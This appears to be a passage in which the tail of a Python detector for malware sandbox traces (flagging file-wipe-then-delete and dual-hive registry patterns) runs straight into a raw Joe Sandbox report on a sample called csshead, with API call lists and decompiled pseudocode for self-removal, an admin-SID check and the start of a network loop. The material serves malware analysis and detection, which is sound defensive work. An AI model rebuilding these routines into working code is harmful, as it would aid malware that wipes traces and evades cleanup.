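REG_KEY_APIS = {"RegOpenKeyEx", "RegCreateKeyEx", "RegDeleteKey", "SHDeleteKey"}


def dual_hive_keys(calls):
    """Subkey arguments (string addresses in this report) opened, created or
    deleted under both HKCU and HKLM."""
    seen = {}
    for c in calls:
        if c["api"].rstrip("AW") in REG_KEY_APIS and len(c["args"]) >= 2:
            hive = as_hex(c["args"][0])
            if hive in (HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE):
                seen.setdefault(c["args"][1], set()).add(hive)
    return sorted(k for k, v in seen.items() if v == {HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE})


# Lines copied from this report: a slice of E00408D0C's entry and the body of E00404608.
MAIN_ENTRY = """\
  • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
  • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
  • Part of subcall function 00408BFC: RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00408C1B
  • Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000002,004021A4,00000000,000F003F,?), ref: 00407331
  • Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000001,004021A4,00000000,000F003F,?), ref: 00407352
  • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
  • GetCurrentProcess.KERNEL32 ref: 00408D33
"""
WIPE_THREAD = """\
  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 0040465B
  • GetFileSize.KERNEL32(000000FF,00000000), ref: 00404670
  • WriteFile.KERNEL32(000000FF,?,00000200,?,00000000), ref: 004046A4
  • FlushFileBuffers.KERNEL32(000000FF), ref: 004046B6
  • CloseHandle.KERNEL32(000000FF), ref: 004046C0
  • DeleteFileA.KERNEL32(?), ref: 004046CA
"""

if __name__ == "__main__":
    for name, text in (("E00408D0C", MAIN_ENTRY), ("E00404608", WIPE_THREAD)):
        calls = parse_trace(text)
        print(name, "wipe_then_delete:", wipe_then_delete(calls),
              "dual_hive_keys:", dual_hive_keys(calls))
```

The read-only CreateFileA in subcall 004047AC (access 0x80000000, no flags) does not trip the first rule, and the key at 00402174 is only ever opened under HKLM, so only 004021A4 is reported as a dual-hive key; both negatives are worth keeping as regression cases when the rules are extended to other reports.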
    APIs
      • Part of subcall function 00416570: CallWindowProcA.USER32(?,?,?,?,?), ref: 0041658D
      • Part of subcall function 00416570: GetParent.USER32(?), ref: 004165A8
      • Part of subcall function 00416570: GetParent.USER32(00000000), ref: 004165AD
      • Part of subcall function 00416570: GetParent.USER32(00000000), ref: 004165B8
      • Part of subcall function 00416570: SendMessageA.USER32(?,0000041E,00000014,00000000), ref: 004165D9
      • Part of subcall function 00416570: SendMessageA.USER32(?,00000430,00000000,00000000), ref: 004165E6
      • Part of subcall function 00416570: RtlEnterCriticalSection.NTDLL(00442B64), ref: 004165ED
      • Part of subcall function 00416570: GetCurrentThreadId.KERNEL32 ref: 00416616
      • Part of subcall function 00416570: SetWindowsHookExA.USER32(00000003,Function_00005B20,00442B90,00000000), ref: 00416669
      • Part of subcall function 00416570: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041669F
      • Part of subcall function 00416570: GetWindowLongA.USER32(00000000,000000EC), ref: 004166AB
    • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00416D92
    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 00416DAF
    • GetProcAddress.KERNEL32(?,OpenThemeData), ref: 00416DC7
    • FreeLibrary.KERNEL32(?), ref: 00416DE7
    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00416E03
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • LoadMenuA.USER32(00442B94), ref: 00420FA1
    • SendMessageA.USER32(?,00000229,00000000,?), ref: 00421001
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00421011
      • Part of subcall function 00420A00: GetCurrentProcess.KERNEL32 ref: 00420A36
      • Part of subcall function 00420A00: FlushInstructionCache.KERNEL32(00000000), ref: 00420A3D
      • Part of subcall function 00420A00: SetLastError.KERNEL32(0000000E), ref: 00420A57
      • Part of subcall function 00420A00: CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 00420AD1
    • SendMessageA.USER32(?,00000225,00000000,00000000), ref: 0042105B
    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00421064
    • GetParent.USER32(?), ref: 0042107A
    • SetFocus.USER32(00000000), ref: 00421081
    • IsWindowVisible.USER32(?), ref: 0042109B
    • GetFocus.USER32 ref: 004210A5
    • IsChild.USER32(00000000,00000000), ref: 004210AD
    • SetFocus.USER32(00000000), ref: 004210B8
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 0041658D
      • Part of subcall function 00415980: GetVersionExA.KERNEL32(?,00000090), ref: 004159B5
      • Part of subcall function 00415980: SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 004159FA
      • Part of subcall function 00415980: GetSystemMetrics.USER32(00000031), ref: 00415A10
      • Part of subcall function 00415980: GetSystemMetrics.USER32(00000032), ref: 00415A1A
      • Part of subcall function 00415980: GetClientRect.USER32 ref: 00415AB9
    • GetParent.USER32(?), ref: 004165A8
    • GetParent.USER32(00000000), ref: 004165AD
    • GetParent.USER32(00000000), ref: 004165B8
      • Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
      • Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
      • Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E
    • SendMessageA.USER32(?,0000041E,00000014,00000000), ref: 004165D9
    • SendMessageA.USER32(?,00000430,00000000,00000000), ref: 004165E6
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 004165ED
    • GetCurrentThreadId.KERNEL32 ref: 00416616
      • Part of subcall function 00414220: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414270
    • GetWindowLongA.USER32(00000000,000000EC), ref: 004166AB
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • SetWindowsHookExA.USER32(00000003,Function_00005B20,00442B90,00000000), ref: 00416669
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041669F
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042A95F
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __getptd.LIBCMT ref: 0042A96D
      • Part of subcall function 00425CFE: RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    • _CallSETranslator.LIBCMT ref: 0042A9A4
      • Part of subcall function 00423FC2: __getptd.LIBCMT ref: 0042404D
    • _GetRangeOfTrysToCheck.LIBCMT ref: 0042A9D2
      • Part of subcall function 0042A8D8: _UnwindNestedFrames.LIBCMT ref: 0042A902
      • Part of subcall function 0042AF11: RtlDecodePointer.NTDLL(0043CFE8), ref: 0042AF23
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 90%
    			E004080BE(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v265;
    				void* _t13;
    				void* _t15;
    				char* _t27;
    				intOrPtr _t31;
    				void* _t33;
    				void* _t35;
    				signed int _t37;
    				signed int _t39;
    				char* _t42;
    				struct HWND__* _t48;
    				intOrPtr _t50;
    				char* _t60;
    				char* _t62;
    				void* _t64;
    				void* _t66;
    
    				_t64 = _t66;
    				_v8 = __eax;
    				if( *0x40a038 != 0) {
    					_t50 =  *0x40a038; // 0x0
    					 *0x40b4f8(_t50);
    				}
    				 *0x40c24c = CreateEventA(0, 0xffffffff, 0, 0);
    				 *0x40a29c = 0xffffffff;
    				_t13 =  *0x40c24c; // 0x0
    				WaitForSingleObject(_t13, 0xffffffff);
    				_t15 =  *0x40c24c; // 0x0
    				CloseHandle(_t15);
    				E00401308( &_v265, 0x40b518);
    				 *((char*)(_t64 + E004012DC(0x40b518) - 0x109)) = 0;
    				E0040133C( &_v265, ".lnk");
    				E0040471C( &_v265, 0, 0);
    				E0040471C(0x40b518, 0x7530, 0xffffffff);
    				if( *0x40a574 != 0) {
    					_t48 =  *0x40a574; // 0x0
    					SendMessageA(_t48, 0x10, 0, 0);
    				}
    				if( *0x40a034 == 0) {
    					if(_v8 == 0) {
    						_t27 =  *0x40a260; // 0x4021a4
    						SHDeleteKeyA(0x80000001, _t27);
    					} else {
    						_t60 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000001, 0x40b752, _t60);
    					}
    					E00404A1C(0x80000001,  &_v265);
    				} else {
    					if(_v8 == 0) {
    						_t42 =  *0x40a260; // 0x4021a4
    						SHDeleteKeyA(0x80000002, _t42);
    					} else {
    						_t62 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000002, 0x40b752, _t62);
    					}
    					E00404A1C(0x80000002,  &_v265);
    				}
    				_t31 =  *0x40b510; // 0x0
    				E00401828(_t31);
    				_t33 =  *0x40a054; // 0x0
    				ReleaseMutex(_t33);
    				_t35 =  *0x40a054; // 0x0
    				CloseHandle(_t35);
    				_t37 =  *0x40a2a0; // 0x0
    				asm("sbb eax, eax");
    				_t39 =  ~( ~_t37);
    				if(_t39 == 0) {
    					ExitProcess(0);
    				}
    				return _t39;
    			}

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
    • CloseHandle.KERNEL32(00000000), ref: 00408112
      • Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
      • Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
      • Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790
    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
    • ExitProcess.KERNEL32 ref: 00408244
      • Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
      • Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D
    • SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
    • SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
      • Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ReleaseMutex.KERNEL32(00000000), ref: 00408221
    • CloseHandle.KERNEL32(00000000), ref: 0040822D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004041CC() {
    				char _v5;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				void* _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				char* _t28;
    				void* _t51;
    
    				_v5 = 0;
    				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
    				if(_v32 == 0 && GetLastError() == 0x3f0) {
    					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
    				}
    				if(_v32 != 0) {
    					_v16 = E004013DC(0x400);
    					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
    					CloseHandle(_v12);
    					if(_v32 != 0) {
    						AllocateAndInitializeSid(0x40a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
    						_t51 =  *_v16 - 1;
    						if(_t51 >= 0) {
    							_v36 = _t51 + 1;
    							_v28 = 0;
    							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
    								_v28 = _v28 + 1;
    								_t28 =  &_v36;
    								 *_t28 = _v36 - 1;
    								if( *_t28 != 0) {
    									continue;
    								}
    								goto L10;
    							}
    							_v5 = 1;
    						}
    						L10:
    						FreeSid(_v24);
    					}
    					E00401440(_v16);
    				}
    				return _v5;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 004041DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
    • GetLastError.KERNEL32 ref: 004041F4
    • GetCurrentProcess.KERNEL32 ref: 00404207
    • OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
    • CloseHandle.KERNEL32(?), ref: 0040424E
    • AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
    • EqualSid.ADVAPI32(?,?), ref: 004042A2
    • FreeSid.ADVAPI32(?), ref: 004042BE
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • RtlDecodePointer.NTDLL(?), ref: 0042BA5D
    • RtlDecodePointer.NTDLL(?), ref: 0042BA89
    • RtlDecodePointer.NTDLL(?), ref: 0042BAAB
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • RtlDecodePointer.NTDLL(?), ref: 0042BA5D
    • RtlDecodePointer.NTDLL(?), ref: 0042BA89
    • RtlDecodePointer.NTDLL(?), ref: 0042BAAB
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • RtlDecodePointer.NTDLL(?), ref: 0042BA5D
    • RtlDecodePointer.NTDLL(?), ref: 0042BA89
    • RtlDecodePointer.NTDLL(?), ref: 0042BAAB
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 0042CE8A
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • GetFileType.KERNEL32(?), ref: 0042CFBD
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
    • GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
    • GetFileType.KERNEL32(00000000), ref: 0042D059
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
    • SetHandleCount.KERNEL32 ref: 0042D0B0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • MapWindowPoints.USER32(?,00000000,00000001,00000001), ref: 004190B6
    • MapWindowPoints.USER32(?,00000000,00000000,00000002), ref: 004190E1
    • GetVersionExA.KERNEL32(?), ref: 00419104
    • SendMessageA.USER32 ref: 00419186
    • IsWindow.USER32(00000000), ref: 0041918F
    • SendMessageA.USER32(00000000,0000052F,00000000,?), ref: 004191D0
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000000), ref: 00411928
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000002), ref: 00411932
      • Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C
    • TrackPopupMenuEx.USER32(?,-00000001,00000000,?,?,?), ref: 00419202
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004188C1
    • GetVersionExA.KERNEL32(?,00000000,00000030), ref: 0041890C
    • CheckMenuRadioItem.USER32(?,?,?,00000000,00000000), ref: 004189DC
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 0041898E
    • SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004189BB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL ref: 0041991C
    • GetCurrentThreadId.KERNEL32 ref: 00419922
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
    • InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
    • ShowWindow.USER32(?,?), ref: 004199EA
      • Part of subcall function 00410190: IsWindow.USER32(?), ref: 0041019A
      • Part of subcall function 00410190: GetWindowLongA.USER32(?,000000FC), ref: 004101B4
      • Part of subcall function 00410190: SetWindowLongA.USER32(?,000000FC,?), ref: 004101CF
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetWindowLongA.USER32(?), ref: 0041EA81
    • GetWindowLongA.USER32(?,000000F0), ref: 0041EA90
    • GetWindowLongA.USER32(?,000000F0), ref: 0041EAA6
    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0041EABB
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000003F), ref: 0041EAD1
    • CreateWindowExA.USER32(00000200,MDIClient,00000000,56000001,00000000,00000000,00000001,00000001,?,?,00442B90,773A8CD0), ref: 0041EB01
    • BringWindowToTop.USER32(00000000), ref: 0041EB18
      • Part of subcall function 00418B30: GetClientRect.USER32 ref: 00418B55
      • Part of subcall function 00418B30: SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000014), ref: 00418B90
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SetTextColor.GDI32(?,?), ref: 00413E6B
    • SetBkMode.GDI32(?,?), ref: 00413E76
    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
    • SelectObject.GDI32(?,00000000), ref: 00413E9C
    • SendMessageA.USER32 ref: 00413F0F
    • DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
    • SelectObject.GDI32(?,?), ref: 00413F47
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • InterlockedIncrement.KERNEL32(00000000), ref: 0042111C
    • lstrlen.KERNEL32 ref: 00421136
    • InterlockedDecrement.KERNEL32(?), ref: 004211A8
    • PathFindExtensionA.SHLWAPI(?), ref: 004211FB
    • lstrcmpi.KERNEL32(00000000,?), ref: 0042120F
    • InterlockedDecrement.KERNEL32(?), ref: 00421230
    • InterlockedDecrement.KERNEL32(?), ref: 0042128D
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004212BA
    • InterlockedDecrement.KERNEL32(?), ref: 004212D3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetSystemMetrics.USER32(0000000F), ref: 00413F80
    • GetObjectA.GDI32(00000038,0000003C,?), ref: 00413FDC
    • CreateFontIndirectA.GDI32(?), ref: 00413FEF
    • SelectObject.GDI32(00000000,?), ref: 00414009
    • DrawTextA.USER32(00000000,?,000000FF,?,00000424), ref: 00414032
    • SelectObject.GDI32(00000000,?), ref: 00414046
    • GetObjectA.GDI32(00000038,0000003C,?), ref: 0041406F
    • GetSystemMetrics.USER32(00000047), ref: 004140AD
    • DeleteObject.GDI32(?), ref: 004140C3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 98%
    			E004084A4() {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				long _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				char _v156;
    				char _v4253;
    				char _v4382;
    				char _v4424;
    				char _v4428;
    				intOrPtr _t119;
    				intOrPtr _t131;
    				intOrPtr _t135;
    				intOrPtr _t140;
    				intOrPtr _t144;
    				intOrPtr _t149;
    				intOrPtr _t152;
    				intOrPtr _t157;
    				intOrPtr _t165;
    				intOrPtr _t170;
    				intOrPtr _t174;
    				intOrPtr _t179;
    				intOrPtr _t187;
    				void* _t195;
    				intOrPtr _t198;
    				signed int _t199;
    				char _t202;
    				intOrPtr _t205;
    				signed int _t208;
    				intOrPtr _t220;
    				intOrPtr _t228;
    				char _t236;
    				intOrPtr _t269;
    				char _t276;
    				intOrPtr _t279;
    				intOrPtr _t283;
    				intOrPtr _t289;
    				intOrPtr* _t290;
    				intOrPtr _t291;
    				intOrPtr _t292;
    				void* _t300;
    				void* _t301;
    				intOrPtr _t281;
    				void* _t317;
    
    				_v68 = _t119;
    				_v40 = E004013DC(0x20000);
    				_v60 = 0;
    				_v64 = 0;
    				_v4382 = 0;
    				if( *0x40b77c == 0) {
    					_t276 =  *0x40c355; // 0x0
    					_v4428 = _t276;
    					E00401308( &_v4424, 0x40c384);
    					while(1) {
    						_t281 =  &_v4428;
    						_t279 =  *0x40a194; // 0x401e9c
    						_v12 = E00405AE8(_t279,  &_v4428, 0);
    						if(_v12 != 0) {
    							goto L4;
    						}
    						Sleep(0x4e20);
    					}
    					while(1) {
    						L4:
    						_v48 = 0;
    						E004064BC( &_v156, 0x32, __eflags);
    						_t283 =  *0x40a198; // 0x401eac
    						E00401308(_v40, _t283);
    						E0040133C(_v40, "1530474054");
    						_t131 =  *0x40a19c; // 0x401eb4
    						E0040133C(_v40, _t131);
    						_t135 =  *0x40b77c; // 0x0
    						E00401864(_t135,  &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t140 =  *0x40a0bc; // 0x401c84
    						E0040133C(_v40, _t140);
    						_t144 =  *0x40c380; // 0x0
    						E00401864(_t144,  &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t149 =  *0x40a0c0; // 0x401c8c
    						E0040133C(_v40, _t149);
    						_t152 =  *0x40c37c; // 0x0
    						E00401164(_t152,  &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t157 =  *0x40a0b4; // 0x401c70
